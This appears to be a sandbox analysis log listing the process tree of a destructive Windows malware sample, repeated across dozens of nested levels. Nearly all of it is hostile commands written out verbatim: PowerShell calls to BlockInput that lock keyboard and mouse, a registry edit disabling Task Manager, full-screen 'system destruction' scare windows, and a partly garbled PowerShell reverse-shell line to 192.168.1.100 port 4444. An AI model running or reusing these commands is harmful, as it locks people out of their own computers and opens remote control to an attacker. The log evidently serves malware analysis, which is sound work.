        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        87⤵
        
        PID:8408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        85⤵
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        83⤵
        
        PID:6372
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mdj2wwff\mdj2wwff.cmdline"
        84⤵
        
        PID:6436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        83⤵
        
        PID:8852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        81⤵
        
        PID:6656
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4xljjsmf\4xljjsmf.cmdline"
        82⤵
        
        PID:6428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        81⤵
        
        PID:8836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        79⤵
        
        PID:5016
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pwdpxgda\pwdpxgda.cmdline"
        80⤵
        
        PID:6872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        79⤵
        
        PID:8720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        77⤵
        
        PID:6964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crseweum\crseweum.cmdline"
        78⤵
        
        PID:5344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        75⤵
        
        PID:6040
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kmrq534o\kmrq534o.cmdline"
        76⤵
        
        PID:7940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        75⤵
        
        PID:8696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        73⤵
        
        PID:6364
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\10pd4qhf\10pd4qhf.cmdline"
        74⤵
        
        PID:6964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        73⤵
        
        PID:8844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        71⤵
        
        PID:3432
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyhib3xz\vyhib3xz.cmdline"
        72⤵
        
        PID:7716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        71⤵
        
        PID:8740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        69⤵
        
        PID:5784
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t2rdettu\t2rdettu.cmdline"
        70⤵
        
        PID:5396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        67⤵
        
        PID:7464
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iok04bz4\iok04bz4.cmdline"
        68⤵
        
        PID:7992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        65⤵
        
        PID:7892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmgzonuy\tmgzonuy.cmdline"
        66⤵
        
        PID:7500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        65⤵
        
        PID:8396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        65⤵
        
        PID:8480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        65⤵
        
        PID:8688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        63⤵
        
        PID:5388
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqyznww5\cqyznww5.cmdline"
        64⤵
        
        PID:7676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        63⤵
        
        PID:7356
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        63⤵
        
        PID:8876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        61⤵
        
        PID:6436
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wdidv4hn\wdidv4hn.cmdline"
        62⤵
        
        PID:5216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        61⤵
        
        PID:812
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmlec3p3\xmlec3p3.cmdline"
        62⤵
        
        PID:5592
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2035.tmp" "c:\Users\Admin\AppData\Local\Temp\xmlec3p3\CSC35984F89389541D7BB31B8C03224439.TMP"
        63⤵
        
        PID:5792
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        61⤵
        
        PID:7704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        61⤵
        
        PID:7532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        61⤵
        
        PID:8792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        59⤵
        
        PID:6940
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lv5f53rw\lv5f53rw.cmdline"
        60⤵
        
        PID:6276
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        59⤵
        
        PID:7692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lykp5pti\lykp5pti.cmdline"
        60⤵
        
        PID:2308
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AB7.tmp" "c:\Users\Admin\AppData\Local\Temp\lykp5pti\CSC3782F553D03548FBB1B963644A477E4.TMP"
        61⤵
        
        PID:6520
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        59⤵
        
        PID:6528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        59⤵
        
        PID:7820
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvrcid34\qvrcid34.cmdline"
        60⤵
        
        PID:6852
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2546.tmp" "c:\Users\Admin\AppData\Local\Temp\qvrcid34\CSCA90CF03CBD70491DB930485061874EF8.TMP"
        61⤵
        
        PID:5360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        59⤵
        
        PID:8460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        57⤵
        
        PID:5640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wiunzelk\wiunzelk.cmdline"
        58⤵
        
        PID:5452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        57⤵
        
        PID:4216
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yjhwoo10\yjhwoo10.cmdline"
        58⤵
        
        PID:5896
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1141.tmp" "c:\Users\Admin\AppData\Local\Temp\yjhwoo10\CSC1337181CB1E04C088ABEB7A5B939F4C.TMP"
        59⤵
        
        PID:5396
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        57⤵
        
        PID:1408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        57⤵
        
        PID:1404
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\im3pnho3\im3pnho3.cmdline"
        58⤵
        
        PID:7632
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES19EC.tmp" "c:\Users\Admin\AppData\Local\Temp\im3pnho3\CSC4DE16FCB236342668E6DF6B0E2EAB032.TMP"
        59⤵
        
        PID:7684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        57⤵
        
        PID:7536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        57⤵
        
        PID:8596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        55⤵
        
        PID:6760
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bzfo50g4\bzfo50g4.cmdline"
        56⤵
        
        PID:6764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        55⤵
        
        PID:6448
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d1ac5vu5\d1ac5vu5.cmdline"
        56⤵
        
        PID:5004
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC40.tmp" "c:\Users\Admin\AppData\Local\Temp\d1ac5vu5\CSCA9A63285758C4D46B7EC9DA92D1922F5.TMP"
        57⤵
        
        PID:6872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        55⤵
        
        PID:204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        55⤵
        
        PID:7476
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5x4jfyhx\5x4jfyhx.cmdline"
        56⤵
        
        PID:6644
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13E1.tmp" "c:\Users\Admin\AppData\Local\Temp\5x4jfyhx\CSCE51B5C80A2B54AE1839FD693A4F71399.TMP"
        57⤵
        
        PID:6640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        55⤵
        
        PID:4248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        55⤵
        
        PID:8604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        53⤵
        
        PID:6184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\whoywpt1\whoywpt1.cmdline"
        54⤵
        
        PID:6492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        53⤵
        
        PID:7372
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\voeeq1me\voeeq1me.cmdline"
        54⤵
        
        PID:700
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES579.tmp" "c:\Users\Admin\AppData\Local\Temp\voeeq1me\CSCA1B0DF5A4FFA4901AC40B3C3383E079.TMP"
        55⤵
        
        PID:6024
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        53⤵
        
        PID:7996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        53⤵
        
        PID:6880
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o11kws0z\o11kws0z.cmdline"
        54⤵
        
        PID:5804
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
